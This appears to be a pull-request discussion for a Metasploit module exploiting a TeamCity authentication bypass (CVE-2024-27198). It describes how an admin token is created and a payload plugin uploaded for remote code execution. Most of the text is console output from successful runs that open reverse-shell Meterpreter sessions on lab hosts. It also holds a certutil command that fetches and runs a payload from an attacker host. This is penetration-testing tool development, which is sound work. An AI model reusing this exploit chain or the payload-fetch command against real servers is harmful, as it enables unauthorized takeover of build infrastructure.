JetBrains TeamCity Unauthenticated RCE exploit module (CVE-2024-27198)

[sfewer-r7]

This module exploits an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198). An unauthenticated attacker can leverage this to access the REST API and create a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload, allowing the attacker to achieve unauthenticated RCE on the target TeamCity server. On older versions of TeamCity, access tokens do not exist so the exploit will instead create a new administrator account before uploading a plugin. Older version of TeamCity have a debug endpoint (/app/rest/debug/process) that allows for arbitrary commands to be executed, however recent version of TeamCity no longer ship this endpoint, hence why a plugin is leveraged for code execution instead, as this is supported on all versions tested.

For a full technical analysis of the vulnerability, please read our AttackerKB Analysis or our disclosure blog post.

The module has been tested against:

• TeamCity 2023.11.3 (build 147512) running on Windows Server 2022
• TeamCity 2023.11.2 (build 147486) running on Windows Server 2022
• TeamCity 2023.11.3 (build 147512) running on Linux
• TeamCity 2018.2.4 (build 61678) running on Windows Server 2016

and has targets for the Java, Java Server Page, and command architectures, running on the Windows, Linux, and Unix platforms.

Example

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              8111             yes       The target port (TCP)
   SSL                false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI          /                yes       The base path to TeamCity
   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cWStJXIvdtmM     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               eth0             yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.NVAxemdUTVFnSlp4Um1jdkN5Yi12dk1wNkJR.NTIyNTA1NjgtOWM3Zi00YzdiLTkzMTEtYTc2Y2ZkZjRjYTVl
[*] Uploading plugin: CyGZ1ME5
[*] Sending stage (3045380 bytes) to 192.168.86.43
[*] Deleting the plugin...
[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.43:55572) at 2024-02-23 14:24:37 +0000
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_CyGZ1ME5' on the target
[!] This exploit may require manual cleanup of '/home/teamcity/.BuildServer/system/caches/plugins.unpacked/CyGZ1ME5' on the target

meterpreter > getuid
Server username: teamcity
meterpreter > sysinfo
Computer     : 192.168.86.43
OS           : Ubuntu 22.04 (Linux 6.5.0-15-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/opt/TeamCity/bin
meterpreter > 

[W01fh4cker]

For some doubts about CVE-2024-27198, please see https://github.com/W01fh4cker/CVE-2024-27198-RCE?tab=readme-ov-file#-problem for details.

[sec13b]

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[] Command to run on remote host: certutil -urlcache -f http://192.168.1.33:12012/oiB8zh7giZOuuW2r9fc7rw %TEMP%\FMjRYTscXcH.exe & start /B %TEMP%\FMjRYTscXcH.exe
[] Fetch handler listening on 192.168.1.33:12012
[] HTTP server started
[] Adding resource /oiB8zh7giZOuuW2r9fc7rw
[] Started reverse TCP handler on 192.168.1.33:11011
[] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 8.1.2 (build 29993) detected.
[-] Exploit aborted due to failure: unexpected-reply: Failed to create an authentication token.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) >

[sfewer-r7]

per @sec13b comment above:

[+] The target is vulnerable. JetBrains TeamCity 8.1.2 (build 29993) detected.
[-] Exploit aborted due to failure: unexpected-reply: Failed to create an authentication token.

The exploit is untested against 8.1.2 (released 10 years ago circa April 2014). Earliest version I tested against is 2018.2.4. For 2018, access tokens doesn't exist (so the same would be true for 8.1.2), the exploit falls back on creating a new user account, before uploading the payload plugin.

Getting 8.1.2 to work could require changing https://github.com/rapid7/metasploit-framework/pull/18922/files#diff-fb3623b66a3a4669b2336323d7b92c3b1beb85ea57589f597a1fd926166d4f35R177 to detect whatever the error from 8.1.2 is when creating the access token fails.

[sfewer-r7]

There is an unknown problem with the Java payload against Linux (target 0). As of commit 0513654 a Java payload will work on Linux only if the Spawn advanced option is zero (set Spawn 0). The other targets (JSP and command payloads all work fine).

The issue that is breaking Java payloads on Linux, appears to be related to how Payload.java handles spawning a new Java process to run the payload.

Below we can see the payload working if spawn is zero, but as the payload didn't spawn to a new process, all access to the upload plugin blocks (because the payload is running in that thread), so the exploit cannot delete the payload. Also it is non-obvious to the user to set spawn to zero.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              8111             yes       The target port (TCP)
   SSL                false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI          /                yes       The base path to TeamCity
   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
   VHOST                               no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show advanced

Module advanced options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):

   Name                     Current Setting                                                 Required  Description
   ----                     ---------------                                                 --------  -----------
   AllowNoCleanup           false                                                           no        Allow exploitation without the possibility of cleaning up files
   AutoCheck                true                                                            no        Run check before exploit
   ContextInformationFile                                                                   no        The information file that contains context information
   DOMAIN                   WORKSTATION                                                     yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                                            no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler    false                                                           no        Disable the handler code for the selected payload
   EnableContextEncoding    false                                                           no        Use transient context when encoding payloads
   FileDropperDelay                                                                         no        Delay in seconds before attempting cleanup
   FingerprintCheck         true                                                            no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                                           no        Override check result
   HttpClientTimeout                                                                        no        HTTP connection and receive timeout
   HttpPassword                                                                             no        The HTTP password to specify for authentication
   HttpRawHeaders                                                                           no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                                           no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                                         no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                                           no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                             no        The HTTP username to specify for authentication
   SSLServerNameIndication                                                                  no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                                            yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL2,
                                                                                                       SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/2  no        The User-Agent header to use for all requests
                            0100101 Firefox/118.0
   VERBOSE                  true                                                            no        Enable detailed status messages
   WORKSPACE                                                                                no        Specify the workspace for this module
   WfsDelay                 2                                                               no        Additional delay in seconds to wait for a session


Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessio
                                                           ns.html
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        0                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      true             no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit 

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.Sy04ZElUZGFMV041azlsU3FkMjNCbEU5RVBB.ZTFkMDcxZWMtMzM1Mi00NjgwLTk3ZmUtNzFhM2M5NzI3YWIw
[*] Uploading plugin: Cg5BdkfJ
[*] Sending stage (57971 bytes) to 192.168.86.43
[*] Meterpreter session 9 opened (192.168.86.42:4444 -> 192.168.86.43:41498) at 2024-03-11 12:32:07 +0000
[!] Spawn was 0, accessing the plugin will block and timeout.
[*] Target install path: /opt/TeamCity
[*] Target build number: 147512
[*] Target data directory path: /home/teamcity/.BuildServer
[*] Deleting the plugin...
[*] Enabled Plugin UUID: ce95979f-e0b6-43d2-9a47-beda085a620a
[!] Failed to disable the plugin.
[!] Failed to delete the plugin.
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/TeamCity/webapps/ROOT/plugins/Cg5BdkfJ' on the target
[!] This exploit may require manual cleanup of '/opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_Cg5BdkfJ' on the target
[!] This exploit may require manual cleanup of '/home/teamcity/.BuildServer/system/caches/plugins.unpacked/Cg5BdkfJ' on the target

meterpreter > getuid
Server username: teamcity
meterpreter > sysinfo
Computer        : sfewer-ubuntu-test
OS              : Linux 6.5.0-21-generic (amd64)
Architecture    : x64
System Language : en_IE
Meterpreter     : java/linux
meterpreter > 

If we set Spawn to the default value of 2 and run the exploit, we can see via strace on the target system, that Payload.java runs correctly the first time to drop the payload to a temporary directory and calls java via execve to run it, before deleting the dropped files.

There is no evidence the dropped payload runs a second time (or a third which would actually stage the payload). I'm testing on Ubuntu 22.0.4 and OpenJDK 11:

teamcity@sfewer-ubuntu-test:/opt/TeamCity/temp$ uname -a
Linux sfewer-ubuntu-test 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb  9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
teamcity@sfewer-ubuntu-test:/opt/TeamCity/temp$ java --version
openjdk 11.0.22 2024-01-16
OpenJDK Runtime Environment (build 11.0.22+7-post-Ubuntu-0ubuntu222.04.1)
OpenJDK 64-Bit Server VM (build 11.0.22+7-post-Ubuntu-0ubuntu222.04.1, mixed mode, sharing)

An abridged strace log is here, showing the system calls from the tomcat java process where the payload is run the first time to drop to disk:

steve@sfewer-ubuntu-test:~$ sudo strace --trace=file,process -v -s 8192 -f -p 90420 2>&1 | grep \~spawn
[pid 156814] newfstatat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp", 0x7f80d3efc340, 0) = -1 ENOENT (No such file or directory)
[pid 156814] openat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp", O_RDWR|O_CREAT|O_EXCL, 0666) = 970
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp") = 0
[pid 156814] newfstatat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt", 0x7f80d3efc3d0, 0) = -1 ENOENT (No such file or directory)
[pid 156814] mkdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt", 0777) = -1 ENOENT (No such file or directory)
[pid 156814] readlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", 0x7f80d3ef9b10, 1023) = -1 ENOENT (No such file or directory)
[pid 156814] readlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", 0x7f80d3ef9b10, 1023) = -1 ENOENT (No such file or directory)
[pid 156814] newfstatat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", 0x7f80d3efc360, 0) = -1 ENOENT (No such file or directory)
[pid 156814] mkdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", 0777) = 0
[pid 156814] mkdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt", 0777) = 0
[pid 156814] openat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt/Payload.class", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 970
[pid 156814] openat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt.dat", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 970
[pid 156817] execve("/usr/lib/jvm/java-11-openjdk-amd64/bin/java", ["/usr/lib/jvm/java-11-openjdk-amd64/bin/java", "-classpath", "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", "ajgqRLrFVt.Payload"], ["LESSOPEN=| /usr/bin/lesspipe %s", "TEAMCITY_SERVER_SCRIPT=/opt/TeamCity/bin/teamcity-server.sh", "MAIL=/var/mail/teamcity", "LANGUAGE=en_IE:en", "USER=teamcity", "JAVA_TOOL_OPTIONS=-XX:ErrorFile=/opt/TeamCity/temp/java.error.log", "SSH_AGENT_PID=1766", "XDG_SESSION_TYPE=x11", "SHLVL=2", "HOME=/home/teamcity", "OLDPWD=/opt/TeamCity/bin", "GNOME_SHELL_SESSION_MODE=ubuntu", "GTK_MODULES=gail:atk-bridge", "TEAMCITY_BIN_DIRECTORY=/opt/TeamCity/bin", "SYSTEMD_EXEC_PID=2465", "XRDP_PULSE_SOURCE_SOCKET=xrdp_chansrv_audio_in_socket_10", "XRDP_PULSE_SINK_SOCKET=xrdp_chansrv_audio_out_socket_10", "DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus", "CATALINA_PID=/opt/TeamCity/bin/../logs/teamcity.pid", "COLORTERM=truecolor", "PULSE_SCRIPT=/etc/xrdp/pulse/default.pa", "IM_CONFIG_PHASE=1", "TEAMCITY_SERVER_OPTS=", "GTK_IM_MODULE=ibus", "LOGNAME=teamcity", "_=./runAll.sh", "XDG_SESSION_CLASS=user", "TERM=xterm-256color", "GNOME_DESKTOP_SESSION_ID=this-is-deprecated", "JDK_JAVA_OPTIONS= --add-opens jdk.management/com.sun.management.internal=ALL-UNNAMED -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=640M --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin", "SESSION_MANAGER=local/sfewer-ubuntu-test:@/tmp/.ICE-unix/1849,unix/sfewer-ubuntu-test:/tmp/.ICE-unix/1849", "XDG_MENU_PREFIX=gnome-", "XRDP_SOCKET_PATH=/run/xrdp/sockdir", "GNOME_TERMINAL_SCREEN=/org/gnome/Terminal/screen/9678e090_7ada_48c0_b482_34f8afa546d4", "XDG_RUNTIME_DIR=/run/user/1000", "TEAMCITY_LOGS_PATH=/opt/TeamCity/bin/../logs", "DISPLAY=:10.0", "TEAMCITY_RESTART_LOCK_FILE_PATH=/opt/TeamCity/bin/../logs/teamcity.lock", "LANG=en_IE.UTF-8", "XDG_CURRENT_DESKTOP=ubuntu:GNOME", "XMODIFIERS=@im=ibus", "LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:", "GNOME_TERMINAL_SERVICE=:1.86", "SSH_AUTH_SOCK=/run/user/1000/keyring/ssh", "UID=1000", "SHELL=/bin/bash", "QT_ACCESSIBILITY=1", "LESSCLOSE=/usr/bin/lesspipe %s %s", "XRDP_SESSION=1", "GPG_AGENT_INFO=/run/user/1000/gnupg/S.gpg-agent:0:1", "QT_IM_MODULE=ibus", "PWD=/opt/TeamCity/bin", "JAVA_HOME=/usr/lib/jvm/default-java", "XDG_DATA_DIRS=/usr/share/gnome:/usr/local/share:/usr/share:/var/lib/snapd/desktop", "VTE_VERSION=6800", "CATALINA_OPTS=  -server -Xmx1024m -Dteamcity.configuration.path=\"../conf/teamcity-startup.properties\" -Dlog4j2.configurationFile=\"file:/opt/TeamCity/bin/../conf/teamcity-server-log4j.xml\" -Dteamcity_logs=\"/opt/TeamCity/bin/../logs\" -Djava.awt.headless=true"] <unfinished ...>
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt/Payload.class") = 0
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt") = -1 EISDIR (Is a directory)
[pid 156814] rmdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt") = 0
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt.dat") = 0
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir") = -1 EISDIR (Is a directory)
[pid 156814] rmdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir") = 0

TeamCity server is run as a user teamcity and overrides the Java temporary directory location via the command line argument -Djava.io.tmpdir=/opt/TeamCity/temp in the tomcat process. This is not passed to child processes (they get the parents environment variables). I wonder is this part of the problem. Could also be a permission or shared library issue.

[sfewer-r7]

Commit 1e371d0 resolves the Java payload issue on Linux by leveraging the PayloadServlet and running the Java payload in a new thread, while setting the default options for Spawn to be 0 (so it does not drop to disk). Works great on both Linux and Windows.

We can note from below, our Meterpreter is now executing in the TeamCity server process.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit 

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.SnkteGtaT28zcHlERldWQlVXQ1hJbmtpbklj.MWRlNGJkYzYtMzQyMy00OTBhLWI2MjctZWQ3NzcyY2MzNTBk
[*] Uploading plugin: ThFi4v02
[*] Sending stage (57971 bytes) to 192.168.86.43
[*] Target install path: /opt/TeamCity
[*] Target build number: 147512
[*] Target data directory path: /home/teamcity/.BuildServer
[*] Deleting the plugin...
[+] Deleted /opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_ThFi4v02
[+] Deleted /home/teamcity/.BuildServer/system/caches/plugins.unpacked/ThFi4v02
[*] Enabled Plugin UUID: 6ccb09cf-f5c5-4b40-bf12-df6e19f45da1
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.43:41216) at 2024-03-11 18:01:54 +0000
[*] Disabled Plugin UUID: c6a897c8-98e1-4c8e-bc18-f71ca5c343cd
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/TeamCity/webapps/ROOT/plugins/ThFi4v02' on the target

meterpreter > getuid
Server username: teamcity
meterpreter > sysinfo
Computer        : sfewer-ubuntu-test
OS              : Linux 6.5.0-21-generic (amd64)
Architecture    : x64
System Language : en_IE
Meterpreter     : java/linux
meterpreter > getpid
Current pid: 203617
meterpreter > ps

Process List
============

 PID     Name                                                                  User      Path
 ---     ----                                                                  ----      ----
 1       /sbin/init                                                            root      /sbin/init splash
 
 ...snip...
 
 203617  /usr/lib/jvm/default-java/bin/java                                    teamcity  /usr/lib/jvm/default-java/bin/java -Djava.util.logging.config.file=/opt/TeamCity/conf/logging.properties -Djava.util.logging.manag
                                                                                         er=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webres
                                                                                         ources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -server -Xmx1024m -Dteamcity.configuration.path=../conf/teamcity
                                                                                         -startup.properties -Dlog4j2.configurationFile=file:/opt/TeamCity/bin/../conf/teamcity-server-log4j.xml -Dteamcity_logs=/opt/TeamC
                                                                                         ity/bin/../logs -Djava.awt.headless=true -Dignore.endorsed.dirs= -classpath /opt/TeamCity/bin/bootstrap.jar:/opt/TeamCity/bin/tomc
                                                                                         at-juli.jar -Dcatalina.base=/opt/TeamCity -Dcatalina.home=/opt/TeamCity -Djava.io.tmpdir=/opt/TeamCity/temp org.apache.catalina.st
                                                                                         artup.Bootstrap start

[cdelafuente-r7]

Thanks @sfewer-r7 for all these details. It is likely to be the issue reported in this issue and this info will help a lot.

[cdelafuente-r7]

Thank you @sfewer-r7 for this module! I left a few minor comments for now and I will start to test it.

There is one more thing I think would improve readability. I'm wondering if it's possible to reduce the size of the exploit method. I believe a few things can be done:

1. avoid nested if/else and begin/rescue/ensure blocks as much as possible
2. break down the code in multiple methods with descriptive names
3. use custom exceptions in methods, which can be handled in the main exploit method.

[sfewer-r7]

Thanks @cdelafuente-r7 for the great feedback. I think I have addressed all of your suggestions/questions.

There is one more thing I think would improve readability. I'm wondering if it's possible to reduce the size of the exploit method. I believe a few things can be done:

I added commit 6d84f0e which reduces the exploit method quite allot by spinning out two new methods create_payload_plugin and auth_new_admin_user, and flattening a few if/unless blocks.

[cdelafuente-r7]

Thank you for updating this @sfewer-r7 ! Everything looks good to me now. I tested against version 2023.11.3 in a Docker installation and on Windows Server 2019, and verified I got a session with each target. I'll go ahead and land it.

• Example output:

Target 0 (Java) - Windows Server 2019

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 0
target => 0
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=192.168.101.114 LHOST=192.168.101.1

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2019.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.d0pXaG9LaXFJdlM5cC1pcjcwZExGNnF4VDJ3.ZWYyZGYwOWYtMDlmZC00ODRlLWE5NTktYmEzYTgzMzUxM2Vi
[*] Uploading plugin: xaR72E5m
[*] Sending stage (57971 bytes) to 192.168.101.114
[*] Target install path: C:\TeamCity
[*] Target build number: 147512
[*] Target data directory path: C:\ProgramData\JetBrains\TeamCity
[*] Deleting the plugin...
[+] Deleted C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_xaR72E5m
[*] Meterpreter session 15 opened (192.168.101.1:4444 -> 192.168.101.114:57624) at 2024-03-13 18:32:01 +0100
[*] Enabled Plugin UUID: 79b909ce-fd10-435e-aa66-89fdefd4c3ab
[*] Disabled Plugin UUID: 6799eb1e-3e07-499e-a380-ef266cb52d17
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of 'C:\TeamCity\webapps\ROOT\plugins\xaR72E5m' on the target
[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\xaR72E5m' on the target

meterpreter > getuid
Server username: DC02$
meterpreter > sysinfo
Computer        : dc02
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows

Target 1 (Java Server Page) - Windows Server 2019

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=192.168.101.114 LHOST=192.168.101.1

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2019.
